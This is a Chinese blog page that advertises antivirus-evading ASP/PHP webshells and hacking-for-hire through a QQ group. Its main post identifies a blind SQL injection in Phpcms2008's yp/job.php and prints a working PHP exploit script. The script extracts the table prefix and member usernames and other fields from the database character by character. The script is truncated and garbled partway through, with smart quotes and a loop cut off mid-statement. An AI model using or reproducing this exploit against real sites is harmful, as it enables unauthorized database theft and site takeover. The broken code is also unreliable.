火热虚拟主机提权专用Asp大马火热推荐免杀Asp木马隐藏防删 火热最经典Php大马解密版

火爆最新更新暗组免杀Php大马火爆免杀超越神界Asp大马下载 火爆免杀Asp草泥马4.0版

接单交流QQ群:136549649

Phpcms2008漏洞0day和EXP

2012-10-06

漏洞存在于yp/job.php的17-34行,urldecode函数惹的祸,代码如下: ========================================================== switch($action) { case ‘list’: $catid = intval($catid); $head['keywords'] .= ‘职位列表’; $head['title'] .= ‘职位列表’.'_’.$PHPCMS['sitename']; $head['description'] .= ‘职位列表’.'_’.$PHPCMS['sitename']; $templateid = ‘job_list’; if($inputtime) $time = time() – 3600*$inputtime*24; else $time = 0; if($time < 0 )$time = 0; $where = “j.updatetime >= ‘{$time}’ “; $genre = urldecode($genre); if($station)$where .= “AND j.station = ‘{$station}’ “; if($genre)$where .= “AND c.genre = ‘{$genre}’ “; if(!trim($where))$where = ’1′; break; ================================================================= exp: “. “\n[+] Ex. : php “.$argv[0].” localhost /yp 1″. “\n\n”; exit (); } function request ($hostname, $path, $query) { $fp = fsockopen ($hostname, 80); $request = “GET {$path}/job.php?action=list&inputtime=0&station=4&genre={$query} HTTP/1.1\r\n”. “Host: {$hostname}\r\n”. “Connection: Close\r\n\r\n”; fputs ($fp, $request); while (!feof ($fp)) $reply .= fgets ($fp, 1024); fclose ($fp); return $reply; } function exploit ($hostname, $path, $uid, $fld, $chr, $pos) { global $prefix; $chr = ord ($chr); $query = “x’ OR ASCII(SUBSTRING((SELECT {$fld} FROM “.$prefix.”member WHERE userid = ‘{$uid}’),{$pos},1))={$chr} OR ’1′ = ’2″; $query = str_replace (” “, “%20″, $query); $query = str_replace (“‘”, “%2527″, $query); $outcode = request ($hostname, $path, $query); preg_match (“/(.+)<\/span>/”, $outcode, $x); if (strlen (trim ($x [1])) == 0) return false; else return true; } $query = “x%2527″; $outcode = request ($hostname, $path, $query); preg_match(‘/FROM `(.+)yp_job/ie’,$outcode,$match); $prefix=$match[1]; //function lengthcolumns () //{ echo “\n——————————————————————————–\n”; echo ” PhpCms 2008 (job.php \$genre) Blind SQL Injection Exploit\n”; echo ” By My5t3ry (http://hi.baidu.com/netstart)\n”; echo “\n——————————————————————————–\n”; echo “[~]trying to get pre…\n”; if ($match[1]) { echo ‘[+]Good Job!Wo Got The pre -> ‘.$match[1].”\n”; } else { die(” Exploit failed…”); } echo “[~]trying to get username length…\n”; $exit=0; $length=0; $i=0; while ($exit==0) { $query = “x’ OR length((select username from “.$prefix.”member Where userid=’{$userid}’))=”.$i.” OR ’1′=’2″; $query = str_replace (” “, “%20″, $query); $query = str_replace (“‘”, “%2527″, $query); $outcode = request ($hostname, $path, $query); $i++; preg_match (“/(.+)<\/span>/”, $outcode, $x); //echo $outcode; if ($i>20) {die(” Exploit failed…”);} if (strlen (trim ($x [1])) != 0) { $exit=1; }else{ $exit=0; } } $length=$i-1; echo “[+]length -> “.$length; // return $length; //} echo “\n[~]Trying to Crack…”; echo “\n[+]username -> “; while ($pos “; while ($pos

  • Asp免杀大马发布,转载请注明 : http://www.mumaasp.com/109.html
  • 分类:Phpcms2008phpcms漏洞 | 标签: | 1,605人 浏览

    发表评论

    电子邮件地址不会被公开。 必填项已用 * 标注

    *

    您可以使用这些 HTML 标签和属性: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>